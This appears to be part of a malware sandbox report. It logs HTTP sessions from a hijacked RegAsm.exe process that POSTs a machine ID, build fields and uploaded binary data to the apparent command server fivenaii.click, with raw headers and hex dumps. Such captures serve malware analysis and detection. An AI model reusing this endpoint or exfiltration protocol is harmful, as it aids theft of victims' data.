                                                                                              2024-12-27 21:33:20 UTC8795OUTData Raw: 2d 2d 36 47 35 35 58 56 49 56 4a 47 43 59 44 32 4b 44 48 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 47 35 35 58 56 49 56 4a 47 43 59 44 32 4b 44 48 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 47 35 35 58 56 49 56 4a 47 43 59 44 32 4b 44 48 36 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65
                                                                                              Data Ascii: --6G55XVIVJGCYD2KDH6PContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--6G55XVIVJGCYD2KDH6PContent-Disposition: form-data; name="pid"2--6G55XVIVJGCYD2KDH6PContent-Disposition: form-data; name="lid"VC6Dfm--Te
                                                                                              2024-12-27 21:33:21 UTC1122INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:21 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=u79rl1gf7g9sptisk0cnkfli7j; expires=Tue, 22 Apr 2025 15:19:59 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hR4pm5cr8nmLPkquxXnEop1byh3kbtFOcsNWsjqcJrFrfvJwNYM2wdWykthOEdJJSMrvGxaS3GiMwTi96SyGX2xfOG29QCgBgDgdc4DPUMK4BHmG6EjW99MMxdgLH4EoFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dac0fad434a-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1738&rtt_var=699&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2832&recv_bytes=9733&delivery_rate=1513737&cwnd=228&unsent_bytes=0&cid=e30165c752f8e79f&ts=833&x=0"
                                                                                              2024-12-27 21:33:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.449761104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:22 UTC280OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=K1R1QCQ80Y27RGQNZZ
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20442
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:22 UTC15331OUTData Raw: 2d 2d 4b 31 52 31 51 43 51 38 30 59 32 37 52 47 51 4e 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 31 52 31 51 43 51 38 30 59 32 37 52 47 51 4e 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 31 52 31 51 43 51 38 30 59 32 37 52 47 51 4e 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f
                                                                                              Data Ascii: --K1R1QCQ80Y27RGQNZZContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--K1R1QCQ80Y27RGQNZZContent-Disposition: form-data; name="pid"3--K1R1QCQ80Y27RGQNZZContent-Disposition: form-data; name="lid"VC6Dfm--TestO
                                                                                              2024-12-27 21:33:22 UTC5111OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60
                                                                                              Data Ascii: `M?lrQMn 64F6(X&7~`
                                                                                              2024-12-27 21:33:23 UTC1132INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:23 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=6isg9qjnhp2c72rif56189md4a; expires=Tue, 22 Apr 2025 15:20:02 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2FBCKmL2%2F4Q3B3cnGcuKlE8jQZCCZMTqq1U535cW5dzkmQBUMvboZq6jQskZ0xu5cghuyWV54unMeg9vLeYyTPWCsuFNJuK70BfIFo3kHuI%2FY3u%2FnBF9rnN8haPKbrCfIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dbb29e1427f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1607&rtt_var=617&sent=20&recv=25&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21402&delivery_rate=1751649&cwnd=239&unsent_bytes=0&cid=9a08c280fe838b81&ts=1246&x=0"
                                                                                              2024-12-27 21:33:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.449763104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:25 UTC277OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=C9M7QTVU9XVV7VB4
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1272
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:25 UTC1272OUTData Raw: 2d 2d 43 39 4d 37 51 54 56 55 39 58 56 56 37 56 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 43 39 4d 37 51 54 56 55 39 58 56 56 37 56 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 39 4d 37 51 54 56 55 39 58 56 56 37 56 42 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d
                                                                                              Data Ascii: --C9M7QTVU9XVV7VB4Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--C9M7QTVU9XVV7VB4Content-Disposition: form-data; name="pid"1--C9M7QTVU9XVV7VB4Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk
                                                                                              2024-12-27 21:33:26 UTC1128INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:25 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=iujr80dtbp0fpf3a7hodj6rhdc; expires=Tue, 22 Apr 2025 15:20:04 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xtziaq%2BcyaX%2FxBAwcLhVTyvKycEijKGozDg0aGR33oMmgzCeon%2ForazqQGad6payLUtOPmXuqhkQpgorYvzTKqh98iGHorSY4KtrOHesZGGukp8%2BRmlzT611bmHusp3zRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dcadbe4c46b-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1639&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2185&delivery_rate=1730883&cwnd=226&unsent_bytes=0&cid=00453f30823f6891&ts=773&x=0"
                                                                                              2024-12-27 21:33:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.449762104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:25 UTC270OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=L0O4KIZ8
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 18108
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:25 UTC15331OUTData Raw: 2d 2d 4c 30 4f 34 4b 49 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 30 4f 34 4b 49 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 30 4f 34 4b 49 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d 4c 30 4f 34 4b 49 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                              Data Ascii: --L0O4KIZ8Content-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--L0O4KIZ8Content-Disposition: form-data; name="pid"2--L0O4KIZ8Content-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--L0O4KIZ8Content-Dis
                                                                                              2024-12-27 21:33:25 UTC2777OUTData Raw: cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d
                                                                                              Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-
                                                                                              2024-12-27 21:33:26 UTC1131INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:26 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=5ibsuo1lv9glq2seo92grd68rc; expires=Tue, 22 Apr 2025 15:20:05 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2kokgEiQIKMJ28u00nLu05Rhpe3m%2FIStCBak8tXBbDiYbLotkjoGxQ6kA1J0pbPW%2FoHQuC%2FiLfNlnmRmErysy6KTkbmYxa1ZF733fIMhJ%2BSarmAaXKSCf2wtZtkw3Lpxqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dcade127277-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2002&rtt_var=769&sent=16&recv=22&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19058&delivery_rate=1407228&cwnd=225&unsent_bytes=0&cid=9268467016b9fc75&ts=951&x=0"
                                                                                              2024-12-27 21:33:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.449764104.21.60.244437548C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:27 UTC276OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=CP7BM4U9RCKUZ8R
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8771
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:27 UTC8771OUTData Raw: 2d 2d 43 50 37 42 4d 34 55 39 52 43 4b 55 5a 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 43 50 37 42 4d 34 55 39 52 43 4b 55 5a 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 50 37 42 4d 34 55 39 52 43 4b 55 5a 38 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74 75 6b 0d 0a 2d 2d
                                                                                              Data Ascii: --CP7BM4U9RCKUZ8RContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--CP7BM4U9RCKUZ8RContent-Disposition: form-data; name="pid"2--CP7BM4U9RCKUZ8RContent-Disposition: form-data; name="lid"VC6Dfm--TestOtctuk--
                                                                                              2024-12-27 21:33:28 UTC1129INHTTP/1.1 200 OK
                                                                                              Date: Fri, 27 Dec 2024 21:33:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=hb8gvgqr93hb25s2mf96gqcrqm; expires=Tue, 22 Apr 2025 15:20:07 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2BE7RA2WUiXaH5YVpF16G2LeouFbiH4VdP6HnSCdKU%2BdsKOdYVdl2pxX0rZIHEAQmjoV%2FWmRwHJoLBd16AEXdZGtZpMnlTyUwYNfXpqHNr1uz74jHoVJ%2FUArwxJ952h4Dg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f8c6dd8dbb642a0-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1577&rtt_var=611&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2833&recv_bytes=9705&delivery_rate=1764350&cwnd=225&unsent_bytes=0&cid=22e6ede5bd1afcd1&ts=841&x=0"
                                                                                              2024-12-27 21:33:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-27 21:33:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.449765104.21.60.244437552C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-27 21:33:27 UTC280OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=NK6VN6CQ4BZSATYGE
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 571134
                                                                                              Host: fivenaii.click
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 2d 2d 4e 4b 36 56 4e 36 43 51 34 42 5a 53 41 54 59 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 42 32 39 35 46 33 31 41 38 34 44 31 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4e 4b 36 56 4e 36 43 51 34 42 5a 53 41 54 59 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4b 36 56 4e 36 43 51 34 42 5a 53 41 54 59 47 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 54 65 73 74 4f 74 63 74
                                                                                              Data Ascii: --NK6VN6CQ4BZSATYGEContent-Disposition: form-data; name="hwid"B9B295F31A84D198BEBA0C6A975F1733--NK6VN6CQ4BZSATYGEContent-Disposition: form-data; name="pid"1--NK6VN6CQ4BZSATYGEContent-Disposition: form-data; name="lid"VC6Dfm--TestOtct
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: b5 19 41 10 99 63 b3 16 7e 74 8a f5 dd e3 18 65 26 61 e0 49 9c 12 90 f2 e6 bf ff d4 22 e4 03 f8 5d 15 2b 4c 25 56 4a 33 96 00 92 9e 84 05 53 1e 87 bd 02 6c 33 05 f0 bb f0 5a df 61 1c 92 d1 db 0a af 31 86 ce 4b d2 f0 bb c9 2e 22 e0 8c 3a 16 c6 71 b1 6b d6 e8 50 c5 ed ab fb b9 6e db 41 6a 90 e3 ff 5b a5 a4 f9 00 dd 7e 57 70 07 0d ea c9 e4 9e 20 e0 b5 85 83 05 68 0a ce 69 61 e1 25 66 ec 9e b4 52 01 88 f7 e7 82 51 ea 31 06 6f c1 d0 b6 cd 12 62 1c 92 ea 15 06 97 12 d3 1c dc 70 a0 41 9e 17 60 8c 8e d9 9e e1 50 02 c9 a9 c0 d4 ed fc 22 4d 9a df e6 e7 e4 b0 87 5f 8c 98 a2 9d 52 5e 8e 5c 28 7a c4 38 fe d5 e2 94 0a 6f 5a 2b 8e 5a 61 2a ab 31 04 cb f4 14 21 36 80 f7 a3 a8 18 53 70 01 c3 a2 a4 6c 35 f8 bb c8 73 6a 1d 89 5c d2 8a 7c 15 ff 98 f1 f8 aa 9d 04 95 cc 48 c7
                                                                                              Data Ascii: Ac~te&aI"]+L%VJ3Sl3Za1K.":qkPnAj[~Wp hia%fRQ1obpA`P"M_R^\(z8oZ+Za*1!6Spl5sj\|H
                                                                                              2024-12-27 21:33:27 UTC15331OUTData Raw: 7c 11 d5 d3 68 ee 95 84 df b7 c4 33 99 55 bf 5c 15 f4 4f 0b 15 09 2f 16 46 34 ab e9 44 14 55 22 24 6f 59 19 49 63 1f 47 da 98 39 bd 9a ce 68 ff b5 06 cd 21 2c 6f 14 94 c2 be a8 b7 ca 6d 12 70 e4 a6 c2 58 fe 44 44 0b 45 22 d8 4b 82 76 ea 01 ae e3 05 82 8a 94 19 06 7b a5 22 4b 4c d7 32 1f 0d 9b 8a d1 2a e3 d3 cf 2a d7 25 43 04 88 7b ba df e5 37 d1 4d a6 60 a1 18 2d d5 87 78 b9 c2 17 1a b3 1f 0a 45 c6 76 4f 1a 02 1f 24 fa 4d 9d 52 04 62 82 4a ae 29 c5 e8 a0 7b 06 c3 85 66 bf 18 4d 0f 76 ac d3 4b 2c f6 77 9e 67 4a a2 c3 05 79 fb ea e9 7f a9 ba 7e 8f a3 30 0c ca 38 73 73 46 7e ab 6f 8e 59 72 06 a4 11 7e e7 2b 72 73 dd 0c 22 5c 6b 47 a8 d6 f7 07 c8 7b ba ae 47 50 ae 9c e1 ba bc c1 43 a3 af e6 a7 be 8b 5d ae fc 2b e8 67 8b c6 66 bc b7 0b e4 a3 09 67 9e 20 63 ee
                                                                                              Data Ascii: |h3U\O/F4DU"$oYIcG9h!,ompXDDE"Kv{"KL2**%C{7M`-xEvO$MRbJ){fMvK,wgJy~08ssF~oYr~+rs"\kG{GPC]+gfg c
